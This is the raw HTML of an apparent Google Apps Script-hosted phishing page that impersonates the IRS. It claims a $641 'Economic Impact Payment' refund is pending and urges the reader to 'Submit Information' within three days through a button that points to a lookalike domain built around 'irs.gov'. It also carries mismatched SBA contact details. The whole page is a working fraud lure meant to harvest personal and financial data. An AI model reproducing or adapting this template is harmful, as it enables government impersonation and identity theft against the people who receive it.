<!doctype html>
<html>
<head>
<meta name="chromevox" content-script="no">
<link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons" nonce="cktCG4hJCKkZfHpfXLVCyw"><link rel="stylesheet" href="/static/macros/client/css/3533123377-mae_html_css_ltr.css">
<script type="text/javascript" src="/static/macros/client/js/3083802225-warden_bin_i18n_warden__vi.js"></script>
</head>
<body>
<table id="warning-bar-table" class="full_size" cellspacing="0" cellpadding="0"><tr><td><div id="warning" class="warning-bar"></div></td></tr><tr><td style="height: 100%"><iframe id="sandboxFrame" allow="accelerometer *; ambient-light-sensor *; autoplay *; camera *; clipboard-read *; clipboard-write *; encrypted-media *; fullscreen *; geolocation *; gyroscope *; magnetometer *; microphone *; midi *; payment *; picture-in-picture *; screen-wake-lock *; speaker *; sync-xhr *; usb *; web-share *; vibrate *; vr *" sandbox="allow-downloads allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation-by-user-activation">
</iframe>
</td></tr></table><script nonce="pHLOKOfeuqD4pxdvz4lMbA">
(function() {
var el = document.getElementById('sandboxFrame');
el.onload = function() {
goog.script.init("\x7b\x22functionNames\x22:\x5b\x22doGet\x22\x5d,\x22sandboxMode\x22:\x22IFRAME_SANDBOX\x22,\x22callbackTimeout\x22:390000,\x22deploymentId\x22:\x22AKfycby4ygLwREBh4kbJTJzgOr5KUl8DfPHtkaUjJg7k6SvTlG7gwBv3FAEcGthkhHgDAewKJQ\x22,\x22eei\x22:\x22\x22,\x22sandboxHost\x22:\x22https:\/\/n-taik52fhxrivfgfyix62e3l7i4dzjeaqla3okga-0lu-script.googleusercontent.com\x22,\x22clientSideProperties\x22:\x7b\x22google.script.sandbox.mode\x22:\x22IFRAME_SANDBOX\x22,\x22google.script.host.origin\x22:\x22https:\/\/script.google.com\x22\x7d,\x22actionPrefix\x22:\x22\/macros\/s\/AKfycby4ygLwREBh4kbJTJzgOr5KUl8DfPHtkaUjJg7k6SvTlG7gwBv3FAEcGthkhHgDAewKJQ\x22,\x22userHtml\x22:\x22\x3chtml\x3e\x3chead\x3e\x3cscript src\x3d\\\x22\/\/www.google.com\/jsapi\\\x22\x3e\x3c\\\/script\x3e\x3cscript\x3ewindow.parent.maeExportApis_();\x3c\\\/script\x3e\x3c\\\/head\x3e\x3cbody\x3e\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3cdiv\x3e\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3c\\\/div\x3e\\n\\n\x3cdiv\x3e\\n\x3ctable class\x3d\\\x22nl-container\\\x22 style\x3d\\\x22table-layout: fixed; vertical-align: top; min-width: 320px; border-spacing: 0; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; background-color: #ffffff; width: 100%;\\\x22 role\x3d\\\x22presentation\\\x22 width\x3d\\\x22100%\\\x22 cellspacing\x3d\\\x220\\\x22 cellpadding\x3d\\\x220\\\x22 bgcolor\x3d\\\x22#FFFFFF\\\x22\x3e\\n\x3ctbody\x3e\\n\x3ctr style\x3d\\\x22vertical-align: top;\\\x22 valign\x3d\\\x22top\\\x22\x3e\\n\x3ctd style\x3d\\\x22word-break: break-word; vertical-align: top;\\\x22 valign\x3d\\\x22top\\\x22\x3e\\n\x3cdiv style\x3d\\\x22background-color: transparent;\\\x22\x3e\\n\x3cdiv class\x3d\\\x22block-grid mixed-two-up\\\x22 style\x3d\\\x22min-width: 320px; max-width: 570px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; margin: 0 auto; background-color: transparent;\\\x22\x3e\\n\x3cdiv style\x3d\\\x22border-collapse: collapse; display: table; width: 100%; background-color: transparent;\\\x22\x3e \\n\x3cdiv class\x3d\\\x22col num9\\\x22 style\x3d\\\x22display: table-cell; vertical-align: top; min-width: 320px; max-width: 423px; width: 427px;\\\x22\x3e\\n\x3cdiv class\x3d\\\x22col_cont\\\x22 style\x3d\\\x22width: 100% !important;\\\x22\x3e\\n\x3cdiv style\x3d\\\x22border: 0px solid transparent; padding: 5px 0px 5px 0px;\\\x22\x3e \\n\x3cp style\x3d\\\x22font-size: 38px; line-height: 1.2; font-family: Tahoma, Verdana, Segoe, sans-serif; word-break: break-word; mso-line-height-alt: 46px; margin: 0;\\\x22\x3e\x3cspan style\x3d\\\x22font-size: 38px; color: #000000;\\\x22\x3e\x26zwj;\x3cimg src\x3d\\\x22https:\/\/media.abilityjobfair.org\/wp-content\/uploads\/2020\/07\/10171858\/IRS-Logo.jpg\\\x22 alt\x3d\\\x22\\\x22 width\x3d\\\x22190\\\x22 height\x3d\\\x2264\\\x22\x3e\x3cbr\x3e\x3c\\\/span\x3e\x3c\\\/p\x3e\\n\x3cp style\x3d\\\x22font-size: 8px; line-height: 1.2; font-family: Tahoma, Verdana, Segoe, sans-serif; word-break: break-word; mso-line-height-alt: 46px; margin: 0;\\\x22\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3cp\x3e\x3cspan style\x3d\\\x22color: #0000ff;\\\x22\x3e\x3cstrong\x3eThird Round of Economic Impact Payments Status Available.\x3c\\\/strong\x3e\x3c\\\/span\x3e\x3c\\\/p\x3e\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3cp\x3eAfter the last annuall calculations of your fiscal activity, we have identified certain\x3cbr\x3einconsistencies or missing information that require your attention and clarification.\x3c\\\/p\x3e\\n\x3cp\x3eYou will receive a tax refund of $641.00, We will process this amount\x3cbr\x3eonce you have submitted the document we need for the stepsto claim your tax refund.\x3c\\\/p\x3e\\n\x3cp\x3eTo expedite the process and avoid further delays or penalties,\x3cbr\x3ewe advise you to confirm the required document now.\x3c\\\/p\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n \x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n \\n\x3cdiv class\x3d\\\x22col_cont\\\x22 style\x3d\\\x22width: 100% !important;\\\x22\x3e\\n\x3cdiv style\x3d\\\x22border: 0px solid transparent; padding: 5px 0px 5px 0px;\\\x22\x3e\\n\x3cdiv class\x3d\\\x22img-container center fixedwidth\\\x22 style\x3d\\\x22padding-right: 0px; padding-left: 0px;\\\x22 align\x3d\\\x22center\\\x22\x3e\x3cbr\x3e \x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n \x3c\\\/td\x3e\\n\x3c\\\/tr\x3e\\n\x3c\\\/tbody\x3e\\n\x3c\\\/table\x3e\\n\x3c\\\/div\x3e\\n\x3cdiv style\x3d\\\x22background-color: transparent;\\\x22\x3e\\n\x3cdiv class\x3d\\\x22block-grid\\\x22 style\x3d\\\x22min-width: 320px; max-width: 570px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; margin: 0 auto; background-color: transparent;\\\x22\x3e\\n\x3cdiv style\x3d\\\x22border-collapse: collapse; display: table; width: 100%; background-color: transparent;\\\x22\x3e  \\n\x3cdiv class\x3d\\\x22button-container\\\x22 style\x3d\\\x22padding: 10px;\\\x22 align\x3d\\\x22center\\\x22\x3e\x3ca style\x3d\\\x22-webkit-text-size-adjust: none; text-decoration: none; display: inline-block; color: #ffffff; background-color: #0052ff; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; width: auto; padding-top: 5px; padding-bottom: 5px; font-family: Arial, Helvetica Neue, Helvetica, sans-serif; text-align: center; mso-border-alt: none; word-break: keep-all; border: 1px solid #0052ff;\\\x22 href\x3d\\\x22https:\/\/irs.gov.identifiedinformation.turncheckirs.com\/?badu\\\x22 target\x3d\\\x22_blank\\\x22 rel\x3d\\\x22noopener\\\x22\x3e\x3cspan style\x3d\\\x22padding-left: 20px; padding-right: 20px; font-size: 16px; display: inline-block;\\\x22\x3e\x3cspan style\x3d\\\x22font-size: 16px; line-height: 2; word-break: break-word; mso-line-height-alt: 32px;\\\x22\x3e\x3cstrong\x3eSubmit Information\x3c\\\/strong\x3e\x3c\\\/span\x3e\x3c\\\/span\x3e\x3c\\\/a\x3e \x3c\\\/div\x3e\\n\x3cdiv class\x3d\\\x22button-container\\\x22 style\x3d\\\x22padding: 10px;\\\x22 align\x3d\\\x22center\\\x22\x3e\x26nbsp;\x3c\\\/div\x3e\\n\x3cdiv class\x3d\\\x22button-container\\\x22 style\x3d\\\x22padding: 10px; text-align: left;\\\x22 align\x3d\\\x22center\\\x22\x3e\x3cspan style\x3d\\\x22text-align: left; background-color: transparent;\\\x22\x3eFor your convenience, we recommend not using a prepaid card, because sending funds does not support this card.\x3cbr\x3e\x3c\\\/span\x3e\x3cbr\x3e\\n\x3cspan style\x3d\\\x22background-color: transparent;\\\x22\x3eIf we are unable to complete within 3 days, all pending will be cancelled.\x3c\\\/span\x3e\x3c\\\/div\x3e\\n\x3cdiv class\x3d\\\x22button-container\\\x22 style\x3d\\\x22padding: 10px;\\\x22 align\x3d\\\x22center\\\x22\x3e\\n\x3cp style\x3d\\\x22text-align: left;\\\x22\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3cp\x3eQuestions? We\x27re here to help. Call us at 1-800-659-2955 | TTY\/TDD: 1-800-877-8339\x3c\\\/p\x3e\\n\x3cp\x3eOffice of Disaster Assistance\x3cbr\x3eU.S. Small Business Administration\x3c\\\/p\x3e\\n\x3c\\\/div\x3e\\n\\n\x3cdiv style\x3d\\\x22color: #555555; font-family: Tahoma, Verdana, Segoe, sans-serif; line-height: 1.2; padding: 10px;\\\x22\x3e\\n\x3cdiv style\x3d\\\x22line-height: 1.2; font-size: 12px; font-family: Tahoma, Verdana, Segoe, sans-serif; color: #555555; mso-line-height-alt: 14px;\\\x22\x3e\\n\x3cp style\x3d\\\x22font-size: 10px; line-height: 1.2; font-family: Tahoma, Verdana, Segoe, sans-serif; word-break: break-word; mso-line-height-alt: 12px; margin: 0;\\\x22\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n \x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n\x3c\\\/div\x3e\\n\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\\n\x3cdiv\x3e\\n\x3cp\x3e\x26nbsp;\x3c\\\/p\x3e\\n\x3c\\\/div\x3e\x3c\\\/body\x3e\x3c\\\/html\x3e\x22,\x22ncc\x22:\x22\x7b\\\x22awhs\\\x22:true\x7d\x22\x7d", "", undefined, true , false  , "false", "https:\/\/n-taik52fhxrivfgfyix62e3l7i4dzjeaqla3okga-0lu-script.googleusercontent.com", "\/\/drive.google.com\/abuse?id\x3dAKkXjoyRMur5Il0UJMx_Nd-p4klycY4lIOUGelIkgT8vaFnPCOPKqzjjy1gzXRQsfYZwa_L4Qfcn346WPQCDaOIjEj0-K0YcK1z2YyGc%3A0");}
el.src = 'https:\/\/n-taik52fhxrivfgfyix62e3l7i4dzjeaqla3okga-0lu-script.googleusercontent.com\/userCodeAppPanel';
}());
</script>
</body>
</html>
